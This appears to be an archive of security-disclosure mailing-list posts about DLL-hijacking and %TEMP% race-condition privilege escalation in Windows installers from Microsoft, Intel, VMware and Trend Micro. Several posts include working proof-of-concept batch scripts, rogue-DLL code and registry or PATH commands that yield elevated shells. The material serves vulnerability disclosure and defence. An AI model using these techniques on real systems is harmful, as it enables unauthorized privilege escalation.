Defense in depth -- the Microsoft way (part 62): Windows shipped with end-of-life components

2020-02-25 Thread Stefan Kanthak
Hi @ll,

since Microsoft Server 2003 R2, Microsoft dares to ship and install the
abomination known as .NET Framework with every new version of Windows.

Among other components current versions of Windows and .NET Framework

C# compiler (C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe,
J# compiler (C:\Windows\Microsoft.NET\Framework\v2.0.50727\jsc.exe,
VB# compiler (C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe,
resource converter (C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe,
IL assembler (C:\Windows\Microsoft.NET\Framework\v2.0.50727\ilasm.exe,
assembly linker (C:\Windows\Microsoft.NET\Framework\v2.0.50727\al.exe)

Microsoft builds (not just) these programs with Visual C 2005, an
UNSUPPORTED product that reached its end-of-life on 2016-04-12: see

Of course these programs are linked to the equally UNSUPPORTED Visual C
2005 runtime that also reached its end-of-life 2016-04-12, which
Microsoft but nevertheless still dares to ship as side-by-side component:

Windows 10 1909


Windows 7 SP1, with Microsoft Security Essentials installed


The latest security update for the Visual C++ runtime was published
2011-06-04 and updated the version to 8.0.50727.6195: see

The FAQ section of
<> says:

| In the case where a system has no MFC applications currently installed
| but does have the vulnerable Visual Studio or Visual C++ runtimes
| installed, Microsoft recommends that users install this update as a
| defense-in-depth measure, in case of an attack vector being introduced
| or becoming known at a later time.

Microsoft ships VULNERABLE components with .NET Framework and Windows, then
recommends that their unsuspecting users update them, but fails to update
their crap themselses!
In other words: "quod licet jovi non licet bovi"!

JFTR: another highlight (really: a BLATANT lie) from
  <> is:

| Recommendation. The majority of customers have automatic updating enabled
| and will not need to take any action because this security update will be
| downloaded and installed automatically.

NO, Windows Update does NOT update the OUTDATED and VULNERABLE Visual C++
runtime shipped with .NET Framework in Windows 7!

The previous security update was published 2009-07-28 and updated
the version to 8.0.50727.4053: see
<> plus

Of course the statement from the FAQ section of MS11-025 holds for ATL
applications (where MS09-035 should have an equivalent FAQ entry) and
CRT applications too!

Additionally see the MSKB article
which does NOT even list the MSVCRT 2005 any more!

stay tuned, and FAR AWAY from untrustworthy and insecure software like .NET 
Framework and Windows 7
Stefan Kanthak

PS: <> shows
2017-10-10 as EOL for the separate J# redistributable package.

Executable installers are vulnerable^WEVIL (case 58): Intel® Processor Identification Utility - Windows* Version - arbitrary code execution with escalation of privilege

2020-01-31 Thread Stefan Kanthak
tion, notice the
   message boxes titled "Vulnerability and Exploit Detector",
   displayed by %TEMP%\ATTRIB.COM or %TEMP%\ATTRIB.EXE
   running elevated!

Alternate attack:

Any of the 77+ files extracted into %TEMP% can be modified by
the unprivileged user between creation and use, for example
with a simple batch script as shown below, which is started
any time before the executable installer:

--- intel.cmd ---
@echo off
if not exist "%TEMP%\AI_EXTUI_BIN_*" goto :WAIT
for /D %%? in ("%TEMP%\AI_EXTUI_BIN_*") do set FOOBAR=%%?
rem now replace for example "%FOOBAR%\viewer.exe" with
rem an arbitrary executable
--- EOF ---

As soon as one of these files is executed during installation,
the attacker gains administrative privileges.

Vulnerability #3:

Denial of service

Reason: see vulnerability #1

Fix: see vulnerability #1

Demonstration/Proof of concept:

1. Log on with the user account created during Windows setup;

2. Add the NTFS access control entry (D;OIIO;WP;;;WD) meaning
   "deny execution of files for everyone, inheritable to files
   in all subdirectories" to your %TEMP% directory;

3. Download
   and save it in an arbitrary directory;

4. Execute the just downloaded installation program
   "Intel(R) Processor Identification Utility.exe":
   notice the error messages displayed from Windows
   Installer due to non-executable DLLs written in
   the %TEMP% directory!


2019-07-17first vulnerability report sent to vendor

2019-07-18Intel's PSIRT opens case #2208018370

2019-07-28Intel's PSIRT confirms reported vulnerability

2019-08-01second vulnerability report sent to vendor

stay tuned, and FAR away from executable installers!
Stefan Kanthak

PS: wrapping an MSI installer in an executable self-extractor
is COMPLETE nonsense!

[CVE-2019-20358] CVE-2019-9491 in Trend Micro Anti-Threat Toolkit (ATTK) was NOT properly FIXED

2020-01-30 Thread Stefan Kanthak
plus <>,
and <>

stay tuned, and FAR AWAY from so-called security products:
their "security" is typically worse than that of the products
they claim to protect!

Stefan Kanthak

PS: the TrendMicro Anti-Threat Toolkit inspected in October 2019
was built from scrap: the developers used VisualStudio 2008
(end-of-life since two years), linked against an outdated and
vulnerable LIBCMT, shipped an outdated and vulnerable cURL 7.48
plus an outdated and vulnerable libeay32.dll (OpenSSL
1.0.1 is end-of-life since more than 3 years; the last version
This POOR (really: TOTAL lack of proper) software engineering
alone disqualifies this vendor and its "security" products!

JFTR: "they'll never come back" (really: developers SELDOM learn)


2019-10-23sent reports for both vulnerabilities to vendor

2019-10-25vendor acknowledged receipt

2020-01-07CVE-2019-20358 assigned by vendor

2020-01-29updated advisory published by vendor

Defense in depth -- the Microsoft way (part 61): security features are built to fail (or documented wrong)

2020-01-29 Thread Stefan Kanthak
   extern BOOL WINAPI _DllMainCRTStartup(HANDLE hModule, DWORD dwReason, LPVOID 

  ExitProcess(_DllMainCRTStartup != NULL);

   with the following command:

   CL.EXE SNAFU.C SNAFU.LIB /link /DEFAULTLIB:kernel32.lib /ENTRY:mainCRTStartup

6. run the second application SNAFU.EXE and display its exit code
   with the following commands:


   The exit code is 0, proving that /DEPENDENTLOADFLAG:... does
   NOT limit the DLL search path for Windows' module loader!

7. When you change the return value of the DLL's entry point
   function _DllMainCRTStartup() to FALSE, Windows module loader
   shows a message box and the exit code is 0xC142 alias
   STATUS_DLL_INIT_FAILED, again proving that
   /DEPENDENTLOADFLAG:0x800 does NOT work as documented!

8. When you erase SNAFU.DLL and run SNAFU.EXE, Windows module
   loader shows a message box and the exit code is 0xC135
   alias STATUS_DLL_NOT_FOUND, which is the expected behaviour
   if /DEPENDENTLOADFLAG:0x800 would work as documented and limit
   the DLL search path to %SystemRoot%\System32\

stay tuned, and don't trust unverified or incomplete documentation
Stefan Kanthak

Defense in depth -- the Microsoft way (part 60): same old sins and incompetence!

2019-02-26 Thread Stefan Kanthak
Hi @ll,

Microsoft just announced the general availability of their
"Windows Defender Advanced Threat Protection/Endpoint Protection & Response"
for their "downlevel" operating systems Windows 7 and Windows 8.1:

This announcement ends in

| For more information on how you can onboard Windows 7 and Windows 8.1
| machines, check out our documentation

Let's see what Microsoft wants their customers to "board" onto their
Windows 7 and Windows 8.1 installation: this documentation
lists below the heading
"Install and configure Microsoft Monitoring Agent (MMA) to report
 sensor data to Windows Defender ATP"

| Download the agent setup file: Windows 64-bit agent or Windows 32-bit agent.

The URLs for these downloads are

Vulnerability #1

These URLs but redirect to

| HTTP/1.1 302 Moved Temporarily
| Content-Length: 0
| Location:
| Server: Kestrel
| HTTP/1.1 302 Moved Temporarily
| Content-Length: 0
| Location:
| Server: Kestrel

EVERY man-in-the-middle just LOVES Microsoft! Really!

All their documentation and blogs use HTTPS, but for their downloads
they still use HTTP, allowing almost everybody to fiddle with the
downloads to their hearts content and create havoc!

JFTR: of course these downloads can be fetched via HTTPS too, WITHOUT
  the slightest problem!
  If Microsoft would only know...

Vulnerability #2

Let's continue with
and see what Microsoft offers in MMASetup-i386.exe:

| Dump of file MMASetup-i386.exe
| PE signature found
|  14C machine (x86)
|5 number of sections
| 545301EF time date stamp Fri Oct 31 05:28:47 2014

Aaaahhh, a four year old portable executable.
But why does the digital (Authenticode) signature has another
timestamp: "Friday, December 24, 2018, 10:08:18"?

|  Image has the following dependencies:

BINGO! 3 or 4 SURE candidates for DLL hijacking.

But how bad is it? The embedded "application manifest" contains

|  requestedExecutionLevel level="requireAdministrator"

So this a yet another TRIVIAL to exercise "escalation of privilege",
in a piece of software^WJUNK Microsoft ships as "security solution"!

Vulnerability #3

MMASetup-i386.exe is an IExpress-Installer.

|  Debug Directories
|  ...  wextract.pdb

According to MULTIPLE mails/statements from Microsoft's MSRC they
don't use this outdated technology (IExpress installers) any more...

IExpress installers unpack their payload (embedded in a CAB archive,
which itself is embedded as a "resource" in the "portable executable")
into a subdirectory
and execute a predefined command line there (here: "Setup.exe").
The payload of MMASetup-i386.exe is

| Setup.exe
| MOMAgent.msi
| MOMAgent..mst

JFTR: this in turn means that the VULNERABLE wrapper/self-extractor is
  COMPLETELY superfluous: Microsoft could offer the CAB archive
  they embed in MMASetup-.exe for download, and thus
  eliminate vulnerability #2!

There is but yet another vulnerability here: Setup.exe too is (like
ALMOST ALL such executable installers) vulnerable to DLL hijacking,
it loads (at least) MSI.dll from its "application directory"!

When MMASetup-.exe is run under the user account created
during Windows setup, every UNPRIVILEGED (non-elevated) program running
under this account can write to %TEMP%\IXP000.tmp, for example a rogue
MSI.dll, and exercise again an "escalation of privilege".

GAME OVER, third time!

stay tuned (and far away from so-called "security solutions")
Stefan Kanthak

Defense in depth -- the Microsoft way (part 59): we only fix every other vulnerability

2019-01-20 Thread Stefan Kanthak
--- EOF ---

3. create the following text file:

--- officesips.c ---

MessageBoxW((HWND) NULL, L"pwned!", L"pwned!", MB_ICONERROR);
return TRUE;

DWORD dummy = 0;
--- EOF ---

4. compile the source file created in the previous step:

   CL.exe /c /Tcofficesips.c

5. link the object file compiled in the previous step using the
   module definition files generated before:

   LINK.exe /DEF:MSVCR100.def /DEFAULTLIB:user32.dll /DLL 
/ENTRY:_DllMainCRTStartup /OUT:MSVCR100.dll /SUBSYSTEM:Windows
   LINK.exe /DEF:MSVCP140.def /DEFAULTLIB:user32.dll /DLL 
/ENTRY:_DllMainCRTStartup /OUT:MSVCP140.dll /SUBSYSTEM:Windows
   LINK.exe /DEF:VCRuntime140.def /DEFAULTLIB:user32.dll /DLL 
/ENTRY:_DllMainCRTStartup /OUT:VCRuntime140.dll /SUBSYSTEM:Windows

6. add the directory (I use the CWD here) where you built the
   3 DLLs to your PATH environment variable, for example via:


7. start an elevated command prompt and run the PATH command:
   notice the directory added to the PATH in the previous step
   in the printed output.

8. run the command lines to register VBE7.dll, MSOSIP.DLL and
   MSOSIPX.dll: notice the message boxes displayed from the
   previously built DLLs!

   REGSVR32.exe "%ProgramFiles%\vbe7.dll"
   REGSVR32.exe "%ProgramFiles%\msosip.dll"
   REGSVR32.exe "%ProgramFiles%\msosipx.dll"

stay tuned
Stefan Kanthak


2018-05-29vulnerability report sent to vendor

2018-05-30vendor acknowledges receipt, opens case 45733

2018-10-18answer from vendor: "The product was fixed."

2018-10-21followup sent to vendor:
  "NO, the product is NOT fixed.
   You fixed only the vulnerable self-extractor!"

2018-10-23reply from vendor:
  "I will forward your feedback to the Engineering Team

2018-11-06reply from vendor:
  "We are closing this case as a Duplicate of one of
   your earlier cases, 37732, which was fixed with an
   Advisory based on a Defense in Depth method."

   Case 37732 was %SystemRoot%\Temp\OSE*.exe, running
   under SYSTEM account, loads a bunch of DLLs from its
   application directory, which is writable by unprivileged
   users. This is COMPLETELY unrelated."

  no more reply from BRAINDEAD vendor!

Escalation of privilege with Intel Rapid Storage User Interface

2018-11-19 Thread Stefan Kanthak
Hi @ll,

this is the second part of

Intel® Rapid Storage Technology (Intel® RST) User Interface and Driver
for Windows 10 and Windows Server 2016, version (Latest),
released 2/21/2018, available from
as well as the previous version (Previously Released),
released 11/14/2017, available from
the la(te)st version supporting Windows 7 and Windows 8.1,
are vulnerable: they allow arbitrary code execution WITH escalation
of privilege via the RST User Interface program IAStorUI.exe.

CVSS score: 7.5/HIGHCVSS:3.0/AV:L/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H

On x64 processor architecture this program is installed as
"C:\Program Files (x86)\Intel\Intel(R) Rapid Storage Technology\IAStorUI.exe",
and on x86 processor architecture it is installed as
"C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorUI.exe",
i.e. it is a 32-bit program.


IAStorUI.exe depends on .NET Framework 4.x; its embedded "application
manifest" specifies "requireAdministrator", so Windows requests
elevation: "protected" administrators are prompted for consent,
unprivileged standard users are prompted for an administrator password.

All versions of .NET Framework support to load a COM object as code
profiler, enabled via two or three environment variables, thus allowing
arbitrary code execution WITH elevation of privilege through IAStorUI.exe!

>From <>

| A profiler DLL is an unmanaged DLL that runs as part of the
| common language runtime execution engine. As a result, the code
| in the profiler DLL is not subject to the restrictions of managed
| code access security. The only limitations on the profiler DLL are
| those imposed by the operating system on the user who is running
| the profiled application.

>From <>:

| When both environment variable checks pass, the CLR creates an
| instance of the profiler in a similar manner to the COM
| CoCreateInstance function. The profiler is not loaded through a
| direct call to CoCreateInstance. Therefore, a call to CoInitialize,
| which requires setting the threading model, is avoided.

Demonstration/proof of concept:

In the user account created during Windows setup perform the
following actions:

1. fetch
   and save it in an arbitrary directory, for example in %TEMP% or

2. start a command prompt in this directory as UNELEVATED (standard)

2.a set the users environment variables:


   JFTR: the CLSID doesn't matter, use any CLSID you like!

/D 1 /F

2.b. (OPTIONALLY) register SENTINEL.DLL as COM object:


   REG.exe ADD %KEY% /V ThreadingModel /T REG_SZ /D Apartment /F

3. execute the installed IAStorUI.exe: notice the message boxes
   displayed from SENTINEL.DLL running with "integrity level: high"

NOTE: the precondition "user account created during Windows setup"
  is met on typical installations of Windows: according to
  Microsoft's own security intelligence reports, about 1/2 to
  3/4 of the about 600 million Windows installations which send
  telemetry data have only ONE active user account.


1. don't use .NET Framework, at least not in executables which
   are run elevated!

2. NEVER specify "requireAdministrator" or "highestAvailable" in
   the "application manifest" of an executable which uses .NET


1. remove all applications installed (not just) by Intel with
   their drivers that depend on .NET framework and run elevated.

   JFTR: there are LOADS of such crap!

2. Practice STRICT privilege separation: use your privileged
   "Administrator" account (especially the account created during
   Windows setup) ONLY for administrative tasks, and COMPLETELY

[CVE-2018-3635] Executable installers are vulnerable^WEVIL (case 59): arbitrary code execution WITH escalation of privilege via Intel Rapid Storage Technology User Interface and Driver

2018-11-19 Thread Stefan Kanthak
Hi @ll,

the executable installer of the
Intel® Rapid Storage Technology (Intel® RST) User Interface and Driver,
version (LATEST for Windows 7), released 11/14/2017, available
from <> via
is (SURPRISE!) vulnerable!

CVSS score: 7.5/HIGHCVSS:3.0/AV:L/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H

See Intel's security advisory SA-00153

Vulnerability #1:

Although running with ELEVATED (administrative) privileges
(the "application manifest" embedded in SetupRST.exe specifies
"requireAdministrator"), on STANDARD installations of Windows,
i.e. where the user account created during Windows setup is used,
the executable installer creates an UNPROTECTED subdirectory
IIF.tmp in the user's %TEMP% directory.

For this well-known and well-documented vulnerability see
<> and
<> plus

The subdirectory IIF.tmp inherits the NTFS ACLs from its
parent %TEMP%, allowing "full access" for the unprivileged
(owning) user, who can replace/overwrite the DLLs


later loaded and executed by the installer between their creation
and use.
Since these DLLs are executed with administrative privileges, this
vulnerability results in arbitrary code execution WITH escalation
of privilege.

NOTE: the precondition "user account created during Windows setup"
  is met on typical installations of Windows: according to
  Microsoft's own security intelligence reports, about 1/2 to
  3/4 of the about 600 million Windows installations which send
  telemetry data have only ONE active user account.

Demonstration/proof of concept:

1. visit <>,
   then download
   and save it in an arbitrary directory;

2. save the following batch script in the same directory:

   --- IIF.CMD ---
   @If Not Exist "%TEMP%\IIF.tmp" Goto :WAIT
   For /D %%! In ("%TEMP%\IIF.tmp") Do Set IIFTMP=%%!
   Copy /Y SENTINEL.DLL "%IIFTMP%\Resource.dll"
   For /R "%IIFTMP%" %%! In (IntelCommon.dll) Do Copy /Y SENTINEL.DLL "%%!"
   Set IIFTMP=
   --- EOF ---

3. start the batch script per double-click;

4. execute SetupRST.exe: notice the message boxes displayed from
   the replaced DLLs.


1. ALWAYS specify a PROPER "security descriptor" when you create
   (temporary) files or directories in potentially unsafe (i.e.
   user-writable) paths like the %TEMP% directory!
   See <>
   and use the second parameter of CreateDirectory() to properly
   restrict the permissions when running elevated!

2. NEVER load resource(-only) DLLs for execution!
   See <>
   and use the third parameter of LoadLibraryEx() to specify


1. DONT use executable installers; stay far away from such
   eternally vulnerable crap!

2. NEVER run executable installers in unsafe environments,
   especially NEVER from UNSAFE directories like "%TEMP%\" or

3. DISABLE execution of files (via NTFS ACL, as shown below) in
   the systems and every users %TEMP% and every %USERPROFILE%
   (see <>)!

4. Practice STRICT privilege separation: use a your privileged
   "Administrator" account (especially the account created during
   Windows setup) ONLY for administrative tasks, and COMPLETELY
   separate unprivileged user accounts, with elevation requests
   DISABLED, for your everyday/regular work.

Vulnerability #2:

A variant of #1, resulting in denial of service.

Demonstration/proof of concept:

1. add the NTFS access control list entry (D;OIIO;WP;;;WD) meaning
   "deny execution of files in this directory for everyone,
   inheritable to all subdirectories" to the (user's) %TEMP%

   NOTE: this does NOT need administrative privileges!

2. execute SetupRST.exe: notice the message box
   "error loading language resource" displayed.


Create (temporary) files and directories with PROPER permissions!
See above.

stay tune

Defense in depth -- the Microsoft way (part 57): installation of security updates fails on Windows Embedded POSReady 2009

2018-09-02 Thread Stefan Kanthak
   What happened to the "trustworthy computing" initiative?

2.e) But WAIT, it's not over yet:

C:\Dokumente und 

 The /X option extracts the payload into an arbitrary directory; the
 default is the current directory, i.e.
 "C:\Dokumente und Einstellungen\Administrator\Downloads"

 This yields the error message box

| Dekomprimierung fehlgeschlagen
| (X) Datei ist beschädigt
|   [  OK  ]

 WTF? The file is supposed to be corrupt?
 It but installed successful, its checksums are correct!

JFTR: without the /X option, the executable self-extractor SFXCAB
  creates a directory with a random, up to 32 characters "short"
  name in the root directory of the drive with the most free space.

2.f) Let's see whether this error can be cured too by using a shorter path:

C:\Dokumente und 
 /X C:\Windows\Temp


| Dekomprimierung abgeschlossen
|  ^
| /!\ Dekomprimierung abgeschlossen
| ¯¯¯
|   [  OK  ]

C:\Dokumente und Einstellungen\Administrator\Downloads>dir C:\Windows\Temp

 Volume in Laufwerk C: hat keine Bezeichnung.
 Volumeseriennummer: 8CDE-6034

 Verzeichnis von C:\Windows\Temp

01.09.2018  23:18   .
01.09.2018  23:18   ..
01.09.2018  23:18   SP3QFE
01.09.2018  23:18   update
01.02.2018  23:2818.808  spmsg.dll
01.02.2018  23:28   234.872  spuninst.exe
   2 Datei(en)253.680 Bytes
   4 Verzeichnis(se),  8.396.988.416 Bytes frei

stay tuned
Stefan Kanthak

PS: for the other bugs and vulnerabilities in Microsoft's SFXCAB
see <> and/or

Defense in depth -- the Microsoft way (part 57): all the latest MSVCRT installers allow escalation of privilege

2018-08-14 Thread Stefan Kanthak>

Take 6:

The embedded "application manifest" can also be found and printed:

| C:\Users\Stefan\Downloads>FIND.exe "WiX" vc_redist.x86.exe
| WiX Toolset Bootstrapper

The executable will be run with the credentials of its caller.

This but means that all files extracted/copied to %TEMP% and below
(or any other subdirectory) are UNPROTECTED, every process running
under the same user account can tamper with these files!

Take 7:

| C:\Users\Stefan\Downloads>vc_redist.x86.exe

Running on a fully patched Windows 7 SP1, the program loads at least
the following DLLs from its "application directory", executing their
entry point routine with the credentials of the caller:

UXTheme.dll, Cabinet.dll, MSI.dll, Version.dll,
WindowsCodecs.dll, MSLS31.dll, PropSys.dll, NTMARTA.dll,
CryptSP.dll, RPCRtRemote.dll, Secur32.dll, MPR.dll

For this well-known and well-documented vulnerability see
<> and
<> plus

See <> for the
instructions to build these DLLs.
For the following takes, I assume that these DLLs have been placed
into the user's "Downloads" directory.

Take 7, continued:

Running with the callers credentials, the program creates a
subdirectory {2019b6a0-8533-4a04-ac0e-b2c10bdb9841} (notice the
HARD-CODED name) in the user's %TEMP% directory: this subdirectory
inherits the NTFS ACL from its parent %TEMP%, allowing full access
for the current/owning user.
Under this subdirectory it creates several more subdirectories and
extracts multiple files, especially wixstdba.dll, which it loads
afterwards, and a copy of itself, which it executes afterwards,


For this well-known and well-documented vulnerability see
<> and
<> plus

Take 7, continued:

Due to the inherited full access any process running in the same
user account can tamper with these unprotected files between their
creation and use, for example with the following batch scripts:

--- wixstdba.cmd ---
@If Not Exist "%TEMP%\{2019b6a0-8533-4a04-ac0e-b2c10bdb9841}\.ba1\1028" Goto 

Copy "%USERPROFILE%\Downloads\dlldummy.dll" 
--- eof ---

--- wixstdbe.cmd ---
@If Not Exist "%TEMP%\{2019b6a0-8533-4a04-ac0e-b2c10bdb9841}\.be" Goto :wixstdbe

For %%! In (Version MSI Cabinet UXTheme WindowsCodecs MSLS31 PropSys NTMARTA 
CryptSP RPCRtRemote Secur32 MPR) Do Copy
--- eof ---

Take 8:

Running ELEVATED, the program's copy
loads the rogue DLLs copied by the second batch script, executing
their entry point routines with ELEVATED rights: GAME OVER!


* DONT use executable installers!

* NEVER run executable installers in unsafe environments!


* DUMP executable installers, use *.MSI or *.INF plus *.CAB!

stay tuned
Stefan Kanthak

Executable installers are vulnerable^WEVIL (case 55): escalation of privilege with VMware Player 12.5.9

2018-08-02 Thread Stefan Kanthak
Hi @ll,

the executable installer of VMware Player 12.5.9, published in
January 2018, available from
is vulnerable.

JFTR: VMware Player 12.5.9 is the last version which runs on
  32-bit Windows, and the last to support older CPUs.

Although running with administrative privileges (its embedded
application manifest specifies "requireAdministrator"),
VMware-player-12.5.9-7535481.exe extracts files UNPROTECTED
into subdirectories of the user's %TEMP% directory for later
An UNPRIVILEGED process/user running under the same user
account can tamper with these unprotected files between their
creation and their use, resulting in escalation of privilege.

For this well-known and well-documented vulnerability see
<> and
<> plus
<> and

Demonstrations/proof of concepts:

The POCs work on standard installations of Windows, where the
user account created during Windows Setup is used.

This precondition is typically met: according to Microsoft's
own security intelligence reports, about 1/2 to 3/4 of the
about 600 million Windows installations which send telemetry
data have only ONE active user account.
See <>

A) "escalation of privilege":

1. create the following text file in an arbitrary directory:

   --- vmware12.cmd ---
   @If Not Exist 
"%TEMP%\{3932C891-5563-421D-B9C0-DEA6CB35F9F4}~setup\vcredist_x86.exe" Goto 

   Copy NUL: 

   @If Not Exist 
"%TEMP%\{3932C891-5563-421D-B9C0-DEA6CB35F9F4}~setup\vcredist_x64.exe" Goto 

   Copy "%COMSPEC%" 

   Copy "%COMSPEC%" 
   --- EOF ---

2. fetch the executable installer VMware-player-12.5.9-7535481.exe;

3. start the batch script created in step 1, then run the executable
   installer: notice the error message from the Windows Installer,
   and the start of the command processor with administrative rights!

B) "denial of service":

1. add the NTFS "access control list entry" (D;OIIO;WP;;;WD) meaning
   "deny execution of files in this directory for everyone, inheritable
   to files in all subdirectories" to the user's %TEMP% directory;

2. fetch the executable installer VMware-player-12.5.9-7535481.exe
   and run it: admire the MISLEADING wrong error message
   "The installer could not load a required DLL"!

C) "denial of service":

1. create a(n empty) file

2. create the directory C:\VMwareTemp and the (empty) file

3. fetch the executable installer VMware-player-12.5.9-7535481.exe
   and run it: admire the MISLEADING wrong error message
   "Not enough space"!


1. DON'T use executable installers; stay far away from such
   eternally vulnerable crap!

2. NEVER run executable installers from UNSAFE directories like
   "%USERPROFILE%\Downloads\" or "%TEMP%\"
   DISABLE execution of files (as shown above) in %USERPROFILE%!

3. Practice STRICT privilege separation: use a your privileged
   "Administrator" account (especially the account created during
   Windows setup) ONLY for administrative tasks, and COMPLETELY
   separate unprivileged user accounts, with elevation requests
   DISABLED. for your daily/regular work.

stay tuned
Stefan Kanthak

PS: also see <>


2018-06-03vulnerability report(s) sent to vendor

2018-06-13vendor acknowledged receipt:
  "We will look into this and provide feedback in due course."

2018-06-14vendor replies:
  "It is my understanding that Workstation Player 12.x has
   since reached end of general support (in February of 2018)
   as per our Lifecycle Product Matrix


2018-08-02report published

CVE-2016-7085 NOT fixed in VMware-player-12.5.9-7535481.exe

2018-08-01 Thread Stefan Kanthak
Hi @ll,

on February 13, 2016, I sent a vulnerability report regarding the
then current executable installer of VMware-player 7.1.3 to its

On September 14, 2016, VMware published
<> and

I was NOT AMUSED that it took 7 month to fix this beginner's error.

In January 2018, VMware published VMware-player-12.5.9-7535481.exe,
available via <> from
which shows this vulnerability again (plus THREE others), again
allowing arbitrary code execution WITH escalation of privilege!

Apparently VMware's developers haven't heard of regression tests
yet, and their QA (if they have one) seems sound asleep!

On a fully patched Windows 7 SP1, VMware-player-12.5.9-7535481.exe
loads CredSSP.dll, WSHTCPIP.dll, WSHIP6.dll and RASAdHlp.dll from
its "application directory", typically the user's "Downloads"
directory "%USERPROFILE%\Downloads", instead from Windows'
"system directory" "%SystemRoot%\System32".

For this well-known and well-documented vulnerability see
<> and
<> plus

The application manifest embedded in VMware-player-12.5.9-7535481.exe
specifies "requireAdministrator", so any (rogue) DLL placed by the
unprivileged user in the "Downloads" directory is executed with
administrative rights, resulting in arbitrary code execution WITH
escalation of privilege.

CVSS v3 Base Score: 8.2 (High)  CVSS:3.0/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H
CVSS v2 Base Score: 7.8 AV:L/AC:M/Au:N/C:C/I:C/A:C

Demonstration/proof of concept:

1. follow the instructions from
   and build a minefield of 32-bit forwarder DLLs in your "Downloads"

2. download
   and save it in your "Downloads" directory;

3. execute VMware-player-12.5.9-7535481.exe: notice the message
   boxes displayed from the DLLs built in step 1!

stay tuned (and FAR away from ALL executable installers!)
Stefan Kanthak


2018-06-03vulnerability report(s) sent to vendor

2018-06-13vendor acknowledged receipt:
  "We will look into this and provide feedback in due course."

2018-06-14vendor replies:
  "It is my understanding that Workstation Player 12.x has
   since reached end of general support (in February of 2018)
   as per our Lifecycle Product Matrix


2018-08-01report published

Defense in depth -- the Microsoft way (part 56): 10+ year old security update installers are susceptiblle to 20+ year old vulnerability

2018-07-19 Thread Stefan Kanthak
rity/sir/>, from 50% to 75%
 of all about 600 million Windows installations which provide
 telemetry data have only one active user account.

   Since the "application manifest" embedded in VS10SP1-KB4336919-x86.exe
   specifies "requireAdministrator", the first vulnerability then
   results in arbitrary code execution WITH escalation of privilege.


1. DON'T use executable installers; stay far away from such crap!

2. NEVER run executable installers from UNSAFE directories like
   "%USERPROFILE%\Downloads\" or "%TEMP%\"

3. Exercise STRICT privilege separation: use your privileged
   "Administrator" account (especially the account created during
   Windows setup) only for administrative tasks, and a COMPLETELY
   separate unprivileged "standard user" account for your own tasks.

stay tuned
Stefan Kanthak

Defense in depth -- the Microsoft way (part 55): new software built with 5.5 year old tool shows 20+ year old vulnerabilities

2018-07-17 Thread Stefan Kanthak
   MBAM2.5_X64_Server_KB4340040.exe has the same well-known and well-
   documented vulnerabilities too.

   See <>
   and subsequent security advisories from the creators of Wix toolset.

   Microsofts developers are most obviously UNABLE (or INCAPABLE?) to
   even keep their production environment up-to-date!
   Their managers most obviously don't care too, and their QA seems
   sound asleep.

5. MBAM2.5_X64_Server_KB4340040.exe extracts its payload, the real
   installer, into an UNPROTECTED subdirectory of %TEMP% using the
   hard-coded name "{cf45df76-7d9e-499f-8d93-64ec3ee76e20}" and
   executes it ELEVATED.

   The UNPROTECTED subdirectory allows modification of the extracted
   files between creation and use, resulting in elevation of privilege
   (or denial of service).

   Demonstration/proof of concept:

   a) add the NTFS ACE "(D;OIIO;WP;;;WD)" to your %TEMP% directory;
  the ACE means "deny execution of files in this subdirectory for
  everyone, inheritable to files in all subdirectories".

   b) execute MBAM2.5_X64_Server_KB4340040.exe: notice its SILENT

   c) create the following batch script in an arbitrary directory:

   --- kb4340040.cmd ---
   @If Not Exist "%TEMP%\{cf45df76-7d9e-499f-8d93-64ec3ee76e20}" Goto :LOOP

   Rem Add some more loops here which wait for the creation of files
   Rem to be overwritten, and some copy commands to overwrite them ...
   --- EOF ---

   d) run the batch script, then execute MBAM2.5_X64_Server_KB4340040.exe


1. DON'T use executable installers; stay far away from such crap!

2. NEVER run executable installers from UNSAFE directories like
   "%USERPROFILE%\Downloads\" or "%TEMP%\"

3. Exercise STRICT privilege separation: use your privileged
   "Administrator" account (especially the account created during
   Windows setup) only for administrative tasks, and a COMPLETELY
   separate unprivileged "standard user" account for your own tasks.

stay tuned
Stefan Kanthak

[CVE-2018-3667, CVE-2018-3668] Escalation of priviilege via executable installer of Intel Processor Diagnostic Tool

2018-07-04 Thread Stefan Kanthak
rent working
   directory can be removed from the executable search path:

   The batch script setup.bat calls setup.exe and setup64.exe
   without a path, so the command processor doesn't find the
   extracted setup.exe and setup64.exe in its CWD and searches
   them via %PATH%.

   %PATH% is under full control of the unprivileged user, who
   can create rogue setup.exe and setup64.exe in an arbitrary
   directory he adds to the %PATH%, resulting again in arbitrary
   code execution with escalation of privilege.

   For this well-known and well-documented vulnerability see
   <> and
   <> plus

   Proof of concept/demonstration:

   1. start an unprivileged command prompt in an arbitrary
  directory where the unprivileged user can create files,
  for example the user's "Downloads" directory;

   2. add this (current working) directory to the user's PATH:

  REG.exe Add HKCU\Environment /V PATH /T REG_SZ /D "%CD%" /F

   3. copy the command processor %COMSPEC% (or any rogue executable
  of your choice) as setup.exe and setup64.exe into the current
  (working) directory:

  COPY %COMSPEC% "%CD%\setup.exe"
  COPY %COMSPEC% "%CD%\setup64.exe"

   4. set the environment variable NoDefaultCurrentDirectoryInExePath
  to an arbitrary value:

  SET NoDefaultCurrentDirectoryInExePath=*
  REG.exe Add HKCU\Environment /V NoDefaultCurrentDirectoryInExePath /T 
REG_SZ /D "*" /F

   5. execute IPDT_Installer_4.1.024.exe per double-click: notice
  the command processor started instead of the extracted
  executable installers, running with administrative privileges.

#4 Escalation of privilege through DLL search order hijacking

   The extracted executable installers setup.exe and setup64.exe,
   built with the crapware known as InstallShield, load multiple
   Windows system DLLs from their "application directory" %TEMP%
   instead from Windows' "system directory" %SystemRoot%\System32\

   To quote Raymond Chen

   | a rogue DLL in the TEMP directory is a trap waiting to be sprung.

   An unprivileged attacker running in the same user account can
   copy rogue DLLs into %TEMP%; these are loaded and their DllMain()
   routine executed with administrative privileges, once more
   resulting in arbitrary code execution with escalation of privilege.

   For this well-known and well-documented vulnerability see
   <> and
   <> plus

   Proof of concept/demonstration:

   1. follow the instructions from
  and build a minefield of forwarder DLLs in your %TEMP%

   NOTE: if you can't or don't want to build the minefield, download
